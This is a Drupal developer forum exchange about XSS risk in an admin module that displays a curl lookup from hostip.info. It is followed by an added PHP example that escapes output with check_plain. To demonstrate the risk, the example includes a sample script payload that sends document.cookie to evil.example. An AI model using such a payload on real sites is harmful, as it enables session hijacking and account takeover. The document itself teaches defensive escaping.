"Dries Buytaert" wrote:
The screenshots look nice but the code looks a little dangerous as you're not validating the input. Hackers can inject XSS attacks.
I'm not sure who the hackers would be, since this is on the admin side of things, and my script only operates on the hostname that is already in the SQL db.
If the server you 'curl' sends back malicious JavaScript, they could hijack your session and take over your website.
Okay, this I get. The returned result point, that is. (Perhaps if 'hostip.info' wants my web site, they can have it. ;) Where should I look for a similar "wiper" for the return?
Yeah. This script, in the admin pages, only acts on whatever data is in the watchdog 'hostname' field, which is an IP address placed there by other parts of Drupal (as you know. ;)
MySQL tables in Drupal contain insecure data, including the watchdog and statistics tables. Drupal cleans up the data "on output" (just before sending the data to the client). Your code does not clean up the data, whereas the original code did.
Perhaps I'm not following you (and I'd like to), so this is not argumentative, rather it is educational. I just reviewed 'watchdog' again, and I don't see any clean-up. The original watchdog code says:

    $output .= ' <tr><th>'. t('Hostname') ."</th><td>$watchdog->hostname</td></tr>";

I use the same value, in a different place. This _is_ the "on output" value, so whatever Drupal gives me (in /admin/) already, that's exactly what I re-display.

Now, I do notice that 'watchdog' and 'statistics' do redundant work, but whereas the 'watchdog' module just outputs $watchdog->hostname, the 'statistics' module outputs check_plain($access->hostname) (which is the same value, different variable names). This is true for the repeated identical table in both modules: the statistics module wraps the output in another function, watchdog does not.

Any tips on the 'curl' cleaning I can use. Otherwise, with the display of the IP address stored by Drupal, I just repeat whatever 'watchdog' already uses, and that meets my needs.

-- Gary
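The "wiper" Gary asks about is the same check_plain() wrapping the statistics module already applies to the hostname, applied to the curl response as well. The following is an added example, not Gary's module code and not Drupal core: it escapes both the stored hostname and the remote lookup body immediately before they go into the output, and it validates that the watchdog value is really an IP before building a URL from it. The function names (check_plain_local, fetch_geo_raw, geo_rows), the hostip.info endpoint URL and the sample response are all assumptions made for the example; the thread only names the service.

```php
<?php
// Added example (not Gary's module code, not Drupal core). Shows the
// "clean on output" rule Dries describes: both the stored hostname and the
// body returned by the remote lookup are escaped right before they are placed
// in the output, so a <script> tag in either one renders as literal text in
// the admin page instead of executing in the administrator's browser.

// Stand-in for Drupal's check_plain() so this file runs without a Drupal
// bootstrap. Assumption: inside a module you would call check_plain() itself.
// Drupal's check_plain() is htmlspecialchars() with ENT_QUOTES; later Drupal
// releases also reject invalid UTF-8 before escaping.
function check_plain_local($text) {
  return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// Fetch the raw lookup body for an IP. The endpoint URL is an assumption used
// for illustration; the thread names the service, not its API shape.
function fetch_geo_raw($ip) {
  // Refuse to build a URL from anything that is not an IP address. The
  // watchdog hostname column is normally an IP, but it is still stored data
  // that this code did not produce, so treat it as untrusted on the way out.
  if (filter_var($ip, FILTER_VALIDATE_IP) === FALSE) {
    return '';
  }
  $ch = curl_init('http://api.hostip.info/get_html.php?ip=' . rawurlencode($ip));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  $body = curl_exec($ch);
  curl_close($ch);
  return $body === FALSE ? '' : $body;
}

// Build the table rows. The remote body is passed in rather than fetched here
// so the function can be exercised offline with a constructed response.
function geo_rows($hostname, $raw_lookup) {
  $rows  = '<tr><th>Hostname</th><td>' . check_plain_local($hostname) . '</td></tr>';
  $rows .= '<tr><th>Location</th><td>' . check_plain_local($raw_lookup) . '</td></tr>';
  return $rows;
}

// Constructed sample: what a hostile or compromised lookup service could send
// back instead of a plain "Country: ..." line.
$hostile_body = "Country: XX\n<script>new Image().src='http://evil.example/?c='+document.cookie</script>";
$hostname = '203.0.113.7';

// Unescaped, the script in $hostile_body would run with the admin's session.
// Escaped, the angle brackets and quotes are entity-encoded and nothing runs.
print geo_rows($hostname, $hostile_body) . "\n";

// The live flow inside the admin page would be:
// print geo_rows($watchdog->hostname, fetch_geo_raw($watchdog->hostname));
```

The escaping happens at the point of output, not when the curl result is fetched or stored, which is the same place the statistics module does it; that way the raw value is still available if it is ever needed for something other than HTML, and the page cannot forget to escape because the only path into the markup goes through the escaping call.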